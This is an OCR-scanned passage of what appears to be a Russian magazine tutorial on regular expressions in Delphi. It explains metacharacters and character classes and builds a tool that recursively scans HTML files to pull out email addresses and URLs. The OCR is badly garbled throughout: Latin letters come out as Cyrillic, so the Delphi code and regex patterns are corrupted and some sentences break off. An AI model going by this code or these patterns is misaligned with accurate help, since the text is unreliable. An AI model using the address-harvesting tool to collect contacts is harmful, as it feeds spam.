пемб і 1 епате ЕЕ 
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йЕІ-РНІ 



СО ЗВЕЗДЫ РЕГУЛ 



УЧИМСЯ РАБОТАТЬ С РЕГЭКСПАМИ В ЛЮБИМОМ СРЕДЕ РАЗРАБОТКИ 



Регулярные выражения — один из главных инструментов заядлых л инуксоидов и ѵѵеЪ- 
программистов. Проверить введенные пользователем данные, быстро и непринужденно 
пропарсить какую-нибудь НТМЬ-страницу, найти заковыристый фрагмент в большом 
куске текста — задачи, решаемые за несколько минут с помощью регулярных выраже- 
ний. Многие программисты считают, что использовать их могут лишь гуру. Мы так не 
думаем, а потому постараемся сделать все, чтобы при виде наборов символов вроде «[\ш\ 
сі-\.]+@([\ѵА<і-]+(\.[\ѵА-] +)+)» ты не смущался и не испытывал чувство дискомфорта. 



В НЕМНОГО ИСТОРИИ 

История регулярных выражений начинается в далеких 40-х годах. Двое 
нейрофизиологов, Уоррен Мак-Каллох и Уолтер Питтс, трудились в то 
время над моделированием работы нервной системы на нейронном 
уровне. Спустя несколько лет математик Стивен Клин сумел описать 



эти модели с помощью алгебры и дал им имя «регулярные множества». 
Постепенно регулярные выражения стали набирать популярность среди 
кодеров. Такие знаменитые люди, как, например, Кен Томпсон, написали 
множество статей на тему использования регулярных выражений для 
выполнения самых разнообразных задач. Итак, регулярные выражения 
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Результат работы первого примера 




Форма второго примера 



— технология поиска текстовых фрагментов в электронных документах, 
соответствующих определенным правилам. 

г ОСНОВЫ ОСНОВ 

Перед тем как начать использовать регулярные выражения, стоит разо- 
браться с некоторыми понятиями. Начнем с литералов. Литерал — это 
любой отдельный символ. Например: а, Ь, с, 6 — литералы. Думаю, с этим 
все ясно. Едем дальше. Из одних литералов кашу не сваришь, поэтому 
на помощь приходят метасимволы (специальные символы, которые 
выполняют какое-либо дополнительное действие). Наверняка тебе не раз 
приходилось использовать метасимволы при работе в командной строке 
(неважно, ѴѴіпсІоѵѵз ли эта консоль или ІІЫІХ). Например, чтобы вывести в 
ѴѴіпсіоѵѵз списокфайлов определенного каталога, в стб можно применить 
команду біг. Как быть, если мне нужно отобразить все имена файлов, у 
которых расширение Ыті и Нт? Можно выполнить команду сііг и сломать 
глаза, выискивая нужные файлы, а можно воспользоваться конструкцией 
«сПг*.Ыт?». В этой записи присутствует два метасимвола — «*» и »?». 
Звездочкой мы указываем на то, что имя файла может состоять из любых 
символов (литералов), затем мы определяем расширение и ставим знак 
вопроса, который говорит, что после т может не быть ничего или быть 
один любой символ. Для нашей задачи этого вполне достаточно. 

«*» и »?» не единственные метасимволы. К метасимволам также отно- 
сятся: « л » — определяет начало строки; «$» — конец строки; «.» — любой 
литерал в строке; \ѵѵ — все буквы и цифры, а также символ нижнего 
подчеркивания; \ѴѴ — все, что не относится к \ѵѵ; \сІ — любая цифра отО до 
9; \й — все символы, не являющиеся цифрами; \з — любой пробельный 
символ; \5 — не\з; «+» — повторение один или более раз. 

Вроде все ясно, но чувствуется, что не хватает практики. Попробуем 
составить простенькие примеры, чтобы закрепить полученные знания. 
Ты можешь тренироваться на бумажке с карандашом, но лучше скачать 
какой-нибудь редактор для тестирования регулярных выражений. Са- 
мый простой и удобный — ТПедЕхргЗіисІіо. Он написан для тестирования 
регулярных выражений с использованием класса ТПедЕхрг, с помощью 
которого становится возможным применение регулярных выражений в 
ОеІрЫ. Можно скачать столь полезную программу с сайта разработчиков 
( ѵѵѵуѵѵ. геаехрзіисііо.сот ) или взять с нашего диска. 

Итак, запусти программку и внимательно оглядись. Нас интересует 
только первая закладка — Ехргеззіоп. Окно поделено на две части. В 
верхнем поле ввода тебе нужно будет описывать регулярное выражение, 
а в нижнем — входную строку, то есть текст, на котором и будеттестиро- 
ваться выражение. 

Попробуем написать пробный пример. В поле для регулярного выраже- 
ния мы вводим одно лишь слово «Пример», а в качестве пробного текста 
пишем: «Это простой Пример использования регулярных выражений». 



аж ы 



ѵаг 

_бетрРі1е : ТЗбгіпдЬізб ; 

_гедехр : ТКедЕхрг ; 
і, Ъ:іпбедег; 

Ьедіп 

/ / Инициализируем объект для работы с регулярками 
_ гедехр : =ТКедЕхрг . Сгеабе ; 

// Устанавливаем шаблон поиска в зависимости от 
условия 

сазе тобе об 

// Будем искать мыльник 
0: _гедехр.Ехргеззіоп: = 

1 [\ѵЛб-.]+@( [\*Лб-] + (\. [\ѵЛ-]+)+) ' ; 

// Будем искать ЦКЬ 

1: _гедехр. Ехргеззіоп: = ' (Ъббр I ббр) : // ( [ \ѵЛб- 

] + (\. [\*л<а\-] + )+) ( ( [\ѵла\-=\?\\\. /]+)+)*■ ; 

Епб; 

_бетрРі1е : =ТЗбгіпдБізб . Сгеабе; 

_бетрРі1е . ЬоабРготРіІе ( бі1е_пате) ; 

РгодгеззВагІ .Мах: =_бетрРі1е . Соипб ; 

Ь : =8бгТоІпб (СоипбМаіІЬАЬеІ . Сарбіоп) ; 

бог і:=0 бо _бетрРі1е .Соипб -1 бо 
Ьедіп 

ргодгеззВагІ . Розібіоп : =і ; 

іб (_гедехр . Ехес (_бетрРі1е. Збгіпдз [і] ) ) бЬеп 
гереаб 

РезиІбМетоІ .Ьіпез.Абб(_гедехр.МабсЬ[0] ) ; 
Іпс (Ь) ; 

СоипбМаіІЬаЬеІ .Сарбіоп: =ІпбТо8бг (Ь) ; 
ипбіі поб _гедехр . ЕхесЫехб ; 
епб; 

//Освобождаем память 
_гедехр . Ргее ; 

_бетрРі!е . Ргее ; 
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Жмем на Ехес и видим, как во входном тексте выделилось слово «При- 
мер». После нажатия на пимпу ЕхесЫех* программой будет произведе- 
на попытка поиска следующего фрагмента текста, соответствующего 
шаблону. В нашем случае регулярное выражение больше не сработает, 



Перегонный куб 



ѵаг 

_гедехр : ТКедЕхрг ; 

_ДешрРі1е гТЗІігіпдЬізР; 

I : ІгЩедег ; 

Ьедіп 

іб пор (ОрепБіаІодІ . ЕхесиРе) РПеп 
ЕхіР; 

ЬізСѴіемІ . ІРешз . Сіеаг ; 

ЕсІіР2 . ТехР : =0репБіа1од1 . РіІеЫате ; 

_гедехр : =ТКедЕхрг . СгеаРе ; 

_гедехр. Ехргеззіоп: = ' ( [ Л \з]+)\з( [ А \з]+)\з( [ \сІ\ . ] + ) \ 
в( [\й\+-]+) ' ; 

_РешрРі1е : =ТЗРгіпдЬізР . СгеаРе ; 

_РешрРі1е . ЬоайРготЕіІе (ОрепБіаІодІ . РНеИаше) ; 

Рог і:=0 Ро _РешрРі1е . СоипР-1 сіо Ьедіп 
_гедехр . Ехес (_РешрЕі1е . ЗРгіпдз [ і ] ) ; 
іР (_гедехр . Ехес ) РЬеп 

міРЬ ЬізРѴіемІ . ІРешз . АсИ сіо 
Ьедіп 

СарРіоп: =_гедехр.МаРсЬ[1] ; 

ЗиЫРешз . Асісі (_гедехр .МаРсЬ [2 ] ) ; 

ЗиЫРетз .Асі(і(_гедехр.МаРсЬ[3] ) ; 

ЗиЫРешз .А(М(_гедехр.МаРсЬ[4] ) ; 
епЬ; 

епЬ; 

_гедехр . Егее ; 

_РешрЕі1е . Ргее; 




Второй пример в действии 

поскольку слова «Пример» больше нигде нет. Шаблон получился очень 
простым. Если бы регулярные выражения предназначалисьтолько для 
этого, от них не было бы толку. 

Попробуем усложнить пример. В качестве входной строки определим: 
«Первый мой номер: +7-924-1 11-11 -34, а второй: +7-231-331-55-55». 

Наша стобой задача будет найти в этом тексте все номера телефонов. 
Первое, что приходит на ум, — это описать телефоны в качестве шаблона. К 
сожалению, этотспособ не подойдет. Его нельзя назвать универсальным. 
Стоит изменить номер телефона, и шаблон станет бесполезным. Введем 
в качестве шаблона «\+[0-9-]+». Попробуем запустить поиск. Работает? А 
почему? Для понимания сути дела разобьем шаблон на части: 

1 . \+ — явно указываем, что первым символом должен быть «+». Посколь- 
ку символ «+» относится к метасимволам, то просто взятьи поставить его 
мы не можем. Нам придется экранировать его с помощью слэша (слэш 
перед метасимволом превращает его в обычный литерал). 

2 . [0-9-] — в квадратных скобках принято описывать символьные классы 
(интервалы литералов), которые называются «квантификаторами». Чтобы 
описать какой-нибудь интервал, нужно просто указать начальный и конеч- 
ный символ. Например, 0-9 соответствует всем цифрам отО до 9. Таким же 
способом можно задавать и буквенные интервалы: а-і (все латинские буквы 
в нижнем регистре), а-гА-2 (латинские буквы как в нижнем, таки в верхнем 
регистрах). Мы собираемся искать номера телефонов, а они могутсостоять 
из цифр и знака «-», который их разделяет. Больше быть ничего не должно. 

3 . «+» — в данном случае знак плюса играет роль метасимвола. 

Теперь мне бы хотелось обратить твое внимание на описание сим- 
вольных классов. В квадратных скобках все перечисленные символы 
действуют совершенно по-другому. Так, если внутри квадратных скобок 
перед символами поставить метасимвол « л », то это будет означать уже не 
начало строки, а отрицание. Например, [ Л аЬс] — все символы, кроме абс. 
Остальные метасимволы, указанные в символьном классе, теряютсвою 
силу и становятся обычными литералами. 

Рассмотрим такую задачку. Имеются две строки, в которых содержатся 
буквы и цифры. Задача состоит в том, что необходимо выбрать часть 
строки, в которой сначала идут подряд три латинские буквы, а за ними 
— цифры в интервале отЗ до 6. Строки следующие: 

аЪсІаз БЗ 4 5Ыіас15 1 2 4 з ^ сІааЪс 3 456 
аВД23456кіе:3456іе 

Попробуй решить эту задачку самостоятельно с опорой на полученные 
знания. Мое решение будет выглядеть так: [а-г]{3}[3-6]{4}. Наиболее 
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удобным способом решения этой задачи является установка огра- 
ничений на количество находимых символов. Итак, нам нужно найти 
три латинские буквы. Можно, конечно, три раза записать класс [а-г], а 
можно просто указать в фигурных скобках их количество. Это я и сделал. 
Следующее условие — цифры отЗ до 6. Указываем их в классе, не забыв 
о количестве. Вот и все. В результате поиска по этому шаблону в первой 
строке будет выбрано аЬс3456, а во второй — 1^3456. 

^ РЕГУЛЯРНЫЕ ВЫРАЖЕНИЯ В БЕІ-РШ 

В йеІрЫ нет модуля/компонента для работы с регулярными выражениями. 
На мой взгляд, это существенное упущение Вогіапб (теперь Собе беаг). 

К счастью, так считаю не только я, но и тот перец, который закодил класс, 
благодаря которому перед нами открываются безграничные возможнос- 
ти использования регэпсов. Итак, скачай с сайта разработчиков ( ѵѵѵѵѵѵ. 
гедехрзіибіо.сот ) или слей с нашего диска архив с модулем и примерами. 
После подключения к своему проекту РедЕхрг (именнотак он называется) 
тебе становится доступным для создания новый объект типа ТРедЕхрг. 

0 СОБИРАЕМ СВОЙ АНТИСПАМ-ЛИСТ 

В качестве первого практического примера я решил сделать что-нибудь край- 
не полезное. Первое, что мне пришло в голову, — это написать тулзу для выди- 
рания егпаіі-адресов с НТМІ_-страниц, чтобы точно знать, на какие мыльники 
ты никогда в жизни не соберешься послать нежелательную корреспонденцию. 
Сделаемтак, чтобы наша программаумела нетолько выдергивать мыльники, 
но и собирать по нашему приказулинки (чтобы их впоследствии не посещать). 
В качестве входных параметров софтина будет получать путь к папке, в которой 
хранятся Мгтй- и Ы:т-файлы. Итак, включаемся в процесс. 

Как обычно, создаем в ОеІрЫ новый проект и сразу же подключаем недавно 
скачанный нами модуль. После этого рисуем простенькую форму, внешний 
вид которой ты можешь наблюдать на соответствующей иллюстрации. 
Принцип действия примера следующий. По нажатию кнопки перед поль- 
зователем должен появляться диалог выбора директории. После выбора 
каталога управление передается самописной процедуре РіпбРіІезП. Ее код 
приведен в соответствующей врезке. В этой процедуре реализован ал- 
горитм рекурсивного поиска файлов по маске. Для поиска используется 
функция РіпсіРігбіО, в качестве параметров ей нужно передать: 

1) директорию, в которой нужно искать файлы, соответствующие маске; 

2) атрибуты искомыхфайлов (системный, архивный, только для чтения, 
любой); 



3) структуру типа ТЗеагсбНес, в которую попадут результаты поиска. 

Для прохода по всем вложенным папкам используется рекурсия (вызов 
процедурой самой себя). Если вместо директории нашелся нужный файл, 
значит можно смело передавать работу процедуре ЛпбМаіІзІЛіЫ), кото- 
рая в зависимости от последнего параметра будет искать либо мыльники, 
либо ІІРЕы. Код процедуры бпбМаіІІЛіІз приведен во врезке, по назва- 
нию которой ты никогда не догадаешься о ее содержимом :). 

Взглянем на вторую врезку. Перед использованием объекта для работы 
с регулярными выражениями его нужно инициализировать, после чего 
можно приступать и к составлению регулярного выражения. Поскольку 
мы собираемся сделать более или менее универсальную тулзу, придет- 
ся проверить передаваемый в процедуру параметр тобе. Значение О 
будет свидетельствовать о том, что нам требуется распотрошить файлы 
на предмет мыльников, а 1 — что нужны только ІІРІ_-адреса. Для отлова 
етаіі-адресов я устанавливаю воттакой шаблон: [\Мб-.]+0([\ѵѵ\б-]+(\.[\ 
ѵѵ\-]+)+). С первого взгляда он абсолютно непонятен. Давай разбираться: 

1 . [\ѵѵ\сІ-.]+ — эта часть описывает адрес электронной почты до знака 
собачки. В соответствии со стандартом, здесь могут быть любые буквы 
(\ѵѵ) , цифры отО до 9 (\б), знак«-» иточка. После описания символьного 
класса нужно поставить метасимвол «+», иначе под эту часть шаблона у 
тебя будут попадать одиночные символы. 

2. «0» — понятно, что егпаіі-адрес не может быть без значка собачки, 
поэтому нам необходимо его описать. 

3. ([\ѵѵ\б -]+(\.[\ѵѵ\-]+)+) — в этом небольшом кусочке описывается домен- 
ная часть етаіі-адреса. Все используемые здесь метасимволы должны 
быть тебе уже известны, поэтому я не буду повторяться. Просто внима- 
тельно посмотри на эту часть, и все встанет на свои места. Единственное, 
о чем я тебе не рассказывал, так это о скобках. В регулярных выражениях 
они играют двойную роль: описывают группы литералов и сохраняют эти 
группы в специально предопределенных переменных. В рассматривае- 
мом выражении я буду сохранять отдельно имя домена и доменную зону. 
Вот и все, одной строчкой мы описали шаблон для поиска мыльника. 
Классно, правда? Но не стоит забывать, что если тобе = 1 , то нужно ис- 
кать 1)РІ_'ы. Шаблон для определения ссылки выглядит более громоздко: 
(ННр|^р)://([\ѵѵ\б-]+(\.[\ѵѵ\б\-]+)+)(([\ѵѵ\б\-=\?\\Ѵ/]+)+)*. Опять же попробуем 
разобраться с его внутренностями. 

1 . (ЫТрІЛр):// — описываем возможные протоколы. Любой адрес для об- 
ращения к узлу с помощью протокола НИР или РТР должен начинаться с 
ЫТр:// или Лр:// соответственно. В скобках я указываю сначала приставку 








